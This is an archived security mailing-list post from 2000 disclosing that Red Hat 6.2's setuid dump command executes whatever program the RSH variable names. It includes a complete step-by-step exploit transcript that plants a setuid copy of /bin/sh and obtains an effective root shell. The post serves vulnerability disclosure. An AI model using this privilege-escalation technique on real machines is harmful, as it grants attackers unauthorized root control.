|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: Redhat 6.2 dump command executes external program with suid priviledge.
From: JW Oh (mat
IVNTECH.COM)Date: Mon Oct 30 2000 - 23:37:35 CST
- Next message: USSR Labs: "Ultraseek 3.1.x Remote DoS Vulnerability"
- Previous message: FreeBSD Security Advisories: "FreeBSD Security Advisory: FreeBSD-SA-00:61.tcpdump"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
1. Problem:
Linux dump command executes external program with suid priviledge.
2. Tested Version
dump-0.4b15
3. Example
[matlocalhost mat]$ export TAPE=garbage:garbage
[matlocalhost mat]$ export RSH=/home/mat/execute_this
[matlocalhost mat]$ cat > /home/mat/execute_this
#!/bin/sh
cp /bin/sh /home/mat/sh
chmod 4755 /home/mat/sh
[matlocalhost mat]$ chmod 755 /home/mat/execute_this
[matlocalhost mat]$ /sbin/dump -0 /
DUMP: Connection to garbage established.
DUMP: Date of this level 0 dump: Tue Oct 31 14:38:00 2000
DUMP: Date of last level 0 dump: the epoch
DUMP: Dumping /dev/hda2 (/) to garbage on host garbage
DUMP: Label: none
/dev/hda2: Permission denied while opening filesystem
[matlocalhost mat]$ ls -la /home/mat/sh
-rwsr-xr-x 1 root tty 316848 Oct 31 14:38 /home/mat/sh
[matlocalhost mat]$ /home/mat/sh
bash# id
uid=500(mat) gid=500(mat) euid=0(root) groups=500(mat)
=================================================
| |
| mathacksware.com |
| |
=================================================
- Next message: USSR Labs: "Ultraseek 3.1.x Remote DoS Vulnerability"
- Previous message: FreeBSD Security Advisories: "FreeBSD Security Advisory: FreeBSD-SA-00:61.tcpdump"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]